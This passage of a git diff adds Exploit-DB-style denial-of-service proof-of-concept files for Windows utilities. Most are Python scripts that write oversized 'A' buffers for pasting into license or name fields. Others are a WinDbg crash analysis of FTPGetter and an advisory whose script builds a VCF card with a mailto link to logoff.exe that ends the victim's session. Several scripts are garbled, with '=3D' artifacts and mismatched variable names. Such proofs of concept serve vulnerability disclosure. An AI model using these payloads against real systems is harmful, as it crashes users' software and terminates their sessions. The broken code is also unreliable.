+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install ShareAlarmPro
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.ShareAlarmPro Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47860.py b/exploits/windows/dos/47860.py
new file mode 100755
index 000000000..bd85284d3
--- /dev/null
+++ b/exploits/windows/dos/47860.py
@@ -0,0 +1,33 @@
+# Exploit Title: NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install NetShareWatcher
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.NetShareWatcher Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47861.py b/exploits/windows/dos/47861.py
new file mode 100755
index 000000000..0ff878eae
--- /dev/null
+++ b/exploits/windows/dos/47861.py
@@ -0,0 +1,33 @@
+# Exploit Title: Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install Dnss
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.Dnss Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47862.py b/exploits/windows/dos/47862.py
new file mode 100755
index 000000000..1b84f60a3
--- /dev/null
+++ b/exploits/windows/dos/47862.py
@@ -0,0 +1,28 @@
+# Exploit Title: TextCrawler Pro3.1.1 - Denial of Service (PoC)
+# Date: 2020-05-01
+# Vendor Homepage:https://www.digitalvolcano.co.uk/index.html
+# Software Link:  https://www.digitalvolcano.co.uk/download/TextCrawlerPro=setup.exe
+# Exploit Author: Achilles
+# Tested Version: 3.1.1
+# Tested on: Windows 7 x64
+
+
+# 1.- Run python code :TextCrawler.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open TextCrawler Pro
+# 4.- Paste the content of EVIL.txt into the Field: 'License key'
+# 5.- Click 'Activate' and you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer =3D "\x41" * 6000
+
+try:
+open("Evil.txt","w")
+print "[+] Creating %s bytes evil payload.." %len(buffer)
+f.write(buffer)
+f.close()
+print "[+] File created!"
+except:
+print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/47863.py b/exploits/windows/dos/47863.py
new file mode 100755
index 000000000..4dbbe8e99
--- /dev/null
+++ b/exploits/windows/dos/47863.py
@@ -0,0 +1,33 @@
+# Exploit Title: RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/remshutdown_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install RemShutdown
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.RemShutdown Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47864.py b/exploits/windows/dos/47864.py
new file mode 100755
index 000000000..62a2fb41a
--- /dev/null
+++ b/exploits/windows/dos/47864.py
@@ -0,0 +1,33 @@
+# Exploit Title: Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install Backup Key Recovery
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.Backup Key Recovery Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47865.py b/exploits/windows/dos/47865.py
new file mode 100755
index 000000000..8a107324c
--- /dev/null
+++ b/exploits/windows/dos/47865.py
@@ -0,0 +1,33 @@
+# Exploit Title: RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/remshutdown_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install RemShutdown
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.RemShutdown Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47866.py b/exploits/windows/dos/47866.py
new file mode 100755
index 000000000..665a507d9
--- /dev/null
+++ b/exploits/windows/dos/47866.py
@@ -0,0 +1,33 @@
+# Exploit Title: NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install NBMonitor
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.NBMonitor Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47867.py b/exploits/windows/dos/47867.py
new file mode 100755
index 000000000..ac906ffce
--- /dev/null
+++ b/exploits/windows/dos/47867.py
@@ -0,0 +1,63 @@
+# Exploit Title: Office Product Key Finder 1.5.4 - Denial of Service (PoC)
+# Date: 2020-01-06
+# Vendor Homepage: http://www.nsauditor.com/
+# Software Link: http://www.nsauditor.com/downloads/officeproductkeyfinder_setup.exe
+# Exploit Author: Gokkul
+# Tested Version: v1.5.4
+# Tested on: Windows 7 x64
+
+# Software Description:
+# Office Product Key Finder is offline product key finder software and allows to recover and
+# find microsoft office 25 character product key for Microsoft Office 2013, Microsoft Office 2010,
+# Microsoft Office 2007 and Microsoft Office 2003 installed on your PC or on network computers.
+
+
+# 1.- Download and install Office Product Key Finder
+# 2.- Run python code : Office Product Key Finder.py
+
+#!/usr/bin/env python
+DoS=("\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")
+
+myfile=open('CRASHER.txt','w')
+myfile.writelines(Dos)
+myfile.close()
+print("File created")
+
+# 3.- Open CRASHER.txt and copy content to clipboard
+# 4.- Open Office Product Key Finder and under the Register tab Click 'Enter Registration Code'
+# 5.- Paste the content of CRASHER.txt into the Field: 'Name and Key'
+# 6.- click 'OK' you will see a crash.
\ No newline at end of file
diff --git a/exploits/windows/dos/47868.py b/exploits/windows/dos/47868.py
new file mode 100755
index 000000000..a5239e1ce
--- /dev/null
+++ b/exploits/windows/dos/47868.py
@@ -0,0 +1,33 @@
+# Exploit Title: SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/spotftp_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install SpotFTP
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.SpotFTP Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47869.py b/exploits/windows/dos/47869.py
new file mode 100755
index 000000000..668c7ee0c
--- /dev/null
+++ b/exploits/windows/dos/47869.py
@@ -0,0 +1,33 @@
+# Exploit Title: SpotMSN 2.4.6 - 'Name' Denial of Service (PoC)
+# Exploit Author: Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/spotmsn_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install SpotMSN
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.SpotMSN Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47870.py b/exploits/windows/dos/47870.py
new file mode 100755
index 000000000..0f4ab5542
--- /dev/null
+++ b/exploits/windows/dos/47870.py
@@ -0,0 +1,33 @@
+# Exploit Title: SpotIM 2.2 - 'Name' Denial Of Service
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/spotim_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install SpotIM
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.SpotIM Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47871.txt b/exploits/windows/dos/47871.txt
new file mode 100644
index 000000000..f9e844205
--- /dev/null
+++ b/exploits/windows/dos/47871.txt
@@ -0,0 +1,153 @@
+# Exploit Title: FTPGetter Professional 5.97.0.223 -  Denial of Service (PoC)
+# Google Dork: N/A
+# Date: 2020-01-03
+# Exploit Author: FULLSHADE
+# Vendor Homepage: https://www.ftpgetter.com/
+# Software Link: https://www.ftpgetter.com/ftpgetter_pro_setup.exe
+# Version: v.5.97.0.223
+# Tested on: Windows 7
+# CVE : N/A
+
+==================================================================
+THE BUG : NULL pointer dereference -> DOS crash
+==================================================================
+
+The FTPGetter Professional v.5.97.0.223 FTP client suffers from a
+NULL pointer dereference vulnerability via the program not properly
+handling user input when setting the field "Run program" under
+profile properties, it triggers when executing the profile.
+
+==================================================================
+DISCLOSURE : Vendor contacted : MITRE assignment : CVE-2020-5183
+==================================================================
+...
+...
+==================================================================
+WINDBG ANALYSIS AFTER SENDING 50,000 'A' BYTES
+==================================================================
+
+(b84.e88): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000000 ebx=0255d3a0 ecx=04000000 edx=00000030 esi=00000000 edi=00000001
+eip=00855994 esp=0012fbd0 ebp=0012fc6c iopl=0         nv up ei pl zr na pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for FTPGetter.exe -
+FTPGetter!Xtermforminitialization$qqrv+0x202d74:
+00855994 8b5004          mov     edx,dword ptr [eax+4] ds:0023:00000004=????????
+
+0:000> !analyze -v
+*******************************************************************************
+*                                                                             *
+*                        Exception Analysis                                   *
+*                                                                             *
+*******************************************************************************
+
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ftpgcore.dll -
+Failed calling InternetOpenUrl, GLE=12007
+
+FAULTING_IP:
+FTPGetter!Xtermforminitialization$qqrv+202d74
+00855994 8b5004          mov     edx,dword ptr [eax+4]
+
+EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
+ExceptionAddress: 00855994 (FTPGetter!Xtermforminitialization$qqrv+0x00202d74)
+   ExceptionCode: c0000005 (Access violation)
+  ExceptionFlags: 00000000
+NumberParameters: 2
+   Parameter[0]: 00000000
+   Parameter[1]: 00000004
+Attempt to read from address 00000004
+
+FAULTING_THREAD:  00000e88
+
+PROCESS_NAME:  FTPGetter.exe
+
+ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
+
+EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
+
+EXCEPTION_PARAMETER1:  00000000
+
+EXCEPTION_PARAMETER2:  00000004
+
+READ_ADDRESS:  00000004
+
+FOLLOWUP_IP:
+FTPGetter!Xtermforminitialization$qqrv+202d74
+00855994 8b5004          mov     edx,dword ptr [eax+4]
+
+MOD_LIST: <ANALYSIS/>
+
+NTGLOBALFLAG:  0
+
+APPLICATION_VERIFIER_FLAGS:  0
+
+BUGCHECK_STR:  APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ
+
+PRIMARY_PROBLEM_CLASS:  NULL_CLASS_PTR_DEREFERENCE
+
+DEFAULT_BUCKET_ID:  NULL_CLASS_PTR_DEREFERENCE
+
+LAST_CONTROL_TRANSFER:  from 00812591 to 00855994
+
+STACK_TEXT:
+WARNING: Stack unwind information not available. Following frames may be wrong.
+0012fc6c 00812591 0085d350 0085d355 0046d181 FTPGetter!Xtermforminitialization$qqrv+0x202d74
+0012fc8c 0079ffc1 0012fd24 00000000 007a15c2 FTPGetter!Xtermforminitialization$qqrv+0x1bf971
+0012fcf8 007a2780 0012fdc8 007a278a 0012fd1c FTPGetter!Xtermforminitialization$qqrv+0x14d3a1
+0012fd1c 0068fda6 00000111 00000030 00000000 FTPGetter!Xtermforminitialization$qqrv+0x14fb60
+0012fd34 7688c267 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x3d186
+0012fd60 7688c367 00250f60 001f0320 00000111 user32!InternalCallWinProc+0x23
+0012fdd8 7688c999 00000000 00250f60 001f0320 user32!UserCallWinProcCheckWow+0x14b
+0012fe38 7688c9f0 00250f60 00000000 001f0320 user32!DispatchMessageWorker+0x357
+0012fe48 007dec94 0012fe6c 00120100 0012feb8 user32!DispatchMessageW+0xf
+0012fe64 007decd7 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x18c074
+0012fe88 007df016 0012fe9c 007df020 0012feb8 FTPGetter!Xtermforminitialization$qqrv+0x18c0b7
+0012feb8 00404674 00000000 00e75048 015c26bb FTPGetter!Xtermforminitialization$qqrv+0x18c3f6
+0012ff50 00aeae2b 00400000 00000000 015c26bb FTPGetter!_GetExceptDLLinfo+0x112f
+0012ff88 7509ef3c 7ffdc000 0012ffd4 77003688 FTPGetter!madTraceProcess+0x3cef7
+0012ff94 77003688 7ffdc000 7702d7f0 00000000 kernel32!BaseThreadInitThunk+0xe
+0012ffd4 7700365b 004034ec 7ffdc000 00000000 ntdll!__RtlUserThreadStart+0x70
+0012ffec 00000000 004034ec 7ffdc000 00000000 ntdll!_RtlUserThreadStart+0x1b
+
+SYMBOL_STACK_INDEX:  0
+
+SYMBOL_NAME:  ftpgetter!Xtermforminitialization$qqrv+202d74
+
+FOLLOWUP_NAME:  MachineOwner
+
+MODULE_NAME: FTPGetter
+
+IMAGE_NAME:  FTPGetter.exe
+
+DEBUG_FLR_IMAGE_TIMESTAMP:  5dffa0bd
+
+STACK_COMMAND:  dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s ; kb
+
+FAILURE_BUCKET_ID:  NULL_CLASS_PTR_DEREFERENCE_c0000005_FTPGetter.exe!Xtermforminitialization$qqrv
+
+BUCKET_ID:  APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ_ftpgetter!Xtermforminitialization$qqrv+202d74
+
+WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/FTPGetter_exe/5_97_0_221/5dffa0bd/FTPGetter_exe/5_97_0_221/5dffa0bd/c0000005/00455994.htm?Retriage=1
+
+Followup: MachineOwner
+---------
+
+NULL pointer
+
+FOLLOWUP_IP:
+REDftp!Xtermforminitialization$qqrv+202d74
+00855994 8b5004          mov     edx,dword ptr [eax+4]
+
+Stepping into and running
+
+eax=04e8fc78 ebx=004db6b4 ecx=0000000a edx=41414141 esi=02871ae0 edi=00000000
+eip=004db97a esp=04e8fc74 ebp=04e8fec0 iopl=0         nv up ei pl nz ac pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
+REDftp!GetFTPValidationW+0x6e842:
+004db97a 837a5400        cmp     dword ptr [edx+54h],0 ds:0023:41414195=????????
+
+==================================================================
+CVE-2020-5183 is a NULL pointer dereference vulnerability
+==================================================================
\ No newline at end of file
diff --git a/exploits/windows/dos/47873.py b/exploits/windows/dos/47873.py
new file mode 100755
index 000000000..089a7a53d
--- /dev/null
+++ b/exploits/windows/dos/47873.py
@@ -0,0 +1,26 @@
+# Exploit Title: Duplicate Cleaner Pro 4 - Denial of Service (PoC)
+# Date: 2020-01-05
+# Vendor Homepage:https://www.digitalvolcano.co.uk/index.html
+# Software Link:  https://www.digitalvolcano.co.uk/download/DuplicateCleanerPro4_setup.exe
+# Exploit Author: Achilles
+# Tested Version: 4.1.3
+# Tested on: Windows 7 x64
+
+
+# 1.- Run python code :
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open Duplicate Cleaner Pro
+# 4.- Paste the content of EVIL.txt into the Field: 'License key'
+# 5.- Click 'Activate' and you will see a crash.
+
+#!/usr/bin/env python
+buffer =3D "\x41" * 6000
+
+try:
+f.open("Evil.txt","w")
+print "[+] Creating %s bytes evil payload.." %len(buffer)
+f.write(buffer)
+f.close()
+print "[+] File created!"
+except:
+print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/47878.txt b/exploits/windows/dos/47878.txt
new file mode 100644
index 000000000..e477d4cb1
--- /dev/null
+++ b/exploits/windows/dos/47878.txt
@@ -0,0 +1,93 @@
+# Exploit Title: Microsoft Outlook VCF cards - Denial of Service (PoC)
+# Date: 2020-01-04
+# Exploit Author: hyp3rlinx
+# Vendor Homepage: www.microsoft.com
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-MAILTO-LINK-DENIAL-OF-SERVICE.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec     
+ 
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+A VCF file is a standard file format for storing contact information for a person or business.
+Microsoft Outlook supports the vCard and vCalendar features.
+These are a powerful new approach to electronic Personal Data Interchange (PDI).
+
+
+[Vulnerability Type]
+Mailto Link Denial Of Service
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+Windows VCF cards do not properly sanitize email addresses allowing for HTML injection.
+A corrupt VCF card can cause all the users currently opened files and applications to be closed
+and their session to be terminated without requiring any accompanying attacker supplied code. 
+
+This can be done by crafting the Mailto link to point to Windows "logoff.exe". The corrupt VCF card can then
+kill all users applications and also log the target off their computer, if the VCF card is opened in
+using Windows Contacts and the link is clicked.
+
+The logoff.exe executable lives in "C:\Windows\System32" and can terminate applications and log out users without requiring args.
+
+This probably will affect Windows 7 the most as Windows 10 can possibly default opening VCF files in other programs
+like (People). However, users can possibly still choose to open the VCF in Contacts by right-click the file.
+
+Note, this exploit requires user interaction.
+
+[Exploit/POC]
+"VCF_DoS.py"
+
+dirty_vcf=(
+'BEGIN:VCARD\n'
+'VERSION:4.0\n'
+'FN:Session Terminate PoC - ApparitionSec\n'
+'EMAIL:<a href="logoff">DoS@microsoft.com</a>\n'
+'END:VCARD')
+
+f=open("DoS.vcf", "w")
+f.write(dirty_vcf)
+f.close()
+
+print "VCF Denial Of Service card created!"
+print "By hyp3rlinx"
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=P4OGN7pZLSg
+
+
+[Network Access]
+Local
+
+
+[Severity]
+Medium
+
+
+[Disclosure Timeline]
+Vendor Notification: January 2, 2020
+MSRC : "In order to investigate your report I will need an explanation on how an attacker could use the information
+        to exploit another user remotely without the use of social engineering... As such, this thread is being closed"
+      : January 3, 2020
+January 4, 2020 : Public Disclosure
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/dos/47894.py b/exploits/windows/dos/47894.py
new file mode 100755
index 000000000..c387c1ec2
--- /dev/null
+++ b/exploits/windows/dos/47894.py
@@ -0,0 +1,49 @@
+# Exploit Title: ZIP Password Recovery 2.30 - 'ZIP File' Denial of Service (PoC)
+# Exploit Author : ZwX
+# Exploit Date: 2020-01-08
+# Vendor Homepage : https://www.top-password.com/purchase.html
+# Link Software : https://www.top-password.com/download/ZIPPRSetup.exe
+# Tested on OS: Windows 10
+
+Proof of Concept (PoC):
+=======================
+
+1.Download and install ZIP Password Recovery
+2.Open the ZIP Password Recovery
+3.Run the python operating script that will create a file (poc.txt)
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Select Your ZIP File ' and Click on the button 'Next'
+6.ZIP Password Recovery Crashed
+
+#!/usr/bin/python
+
+DoS=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
+"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
